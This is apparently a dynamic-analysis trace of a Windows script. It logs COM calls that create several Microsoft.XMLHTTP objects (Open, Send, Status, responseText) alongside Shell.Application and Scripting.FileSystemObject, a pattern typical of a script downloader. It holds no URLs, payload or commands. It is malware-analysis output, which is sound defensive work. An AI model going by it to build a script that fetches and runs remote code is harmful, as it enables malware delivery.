	[0462.426] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72c0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0462.426] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0463.995] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0463.995] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72c0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0463.995] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0463.995] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0463.995] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72c0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0463.995] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0463.995] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0463.995] SysStringLen (param_1=0x0) returned 0x0
	[0463.995] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0463.996] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0463.996] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0463.996] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0463.996] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0463.996] ??2@YAPEAX_K@Z () returned 0x62f350
	[0463.996] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0463.996] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0463.996] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0463.996] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0463.996] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0463.996] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0463.996] SysStringLen (param_1=0x0) returned 0x0
	[0463.996] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0463.998] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0463.998] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0463.998] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0463.998] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0463.998] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0463.998] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0466.144] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0466.144] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72c0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0466.144] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0466.146] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0466.146] SysStringLen (param_1=0x0) returned 0x0
	[0466.146] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0466.146] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0466.146] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72c0) returned 0x0
	[0466.146] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0466.146] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0466.146] ??2@YAPEAX_K@Z () returned 0x62f330
	[0466.146] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0466.147] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0466.147] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0466.147] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72c0) returned 0x0
	[0466.147] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72c0) returned 0x3
	[0466.147] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0466.147] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72c0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0466.149] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0466.150] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0466.150] SysStringLen (param_1=0x0) returned 0x0
	[0466.150] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0466.150] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0466.150] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7320) returned 0x0
	[0466.150] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0466.150] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7320, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7528) returned 0x0
	[0466.150] ??2@YAPEAX_K@Z () returned 0x62f310
	[0466.150] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7528, pUnkSite=0x62f310) 
	[0466.150] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0466.150] XMLHTTPRequest:IUnknown:Release (This=0x49c7528) returned 0x0
	[0466.150] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7320, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7320) returned 0x0
	[0466.150] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7320) returned 0x3
	[0466.151] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7320, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0466.151] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7320, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0466.151] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7320, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0466.151] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0466.151] SysStringLen (param_1=0x0) returned 0x0
	[0466.151] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0466.151] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0466.151] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0466.151] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0466.151] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0466.151] ??2@YAPEAX_K@Z () returned 0x62f330
	[0466.151] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0466.151] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0466.151] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0466.152] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0466.152] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0466.152] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0466.152] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0466.152] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0466.152] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0466.152] SysStringLen (param_1=0x0) returned 0x0
	[0466.152] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0466.152] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0466.152] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72a0) returned 0x0
	[0466.152] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0466.152] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0466.152] ??2@YAPEAX_K@Z () returned 0x62f310
	[0466.152] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f310) 
	[0466.152] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0466.153] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0466.153] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72a0) returned 0x0
	[0466.153] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72a0) returned 0x3
	[0466.153] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0466.153] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0466.153] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0466.153] longjmp () 
	[0466.153] longjmp () 
	[0466.153] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0466.153] SysStringLen (param_1=0x0) returned 0x0
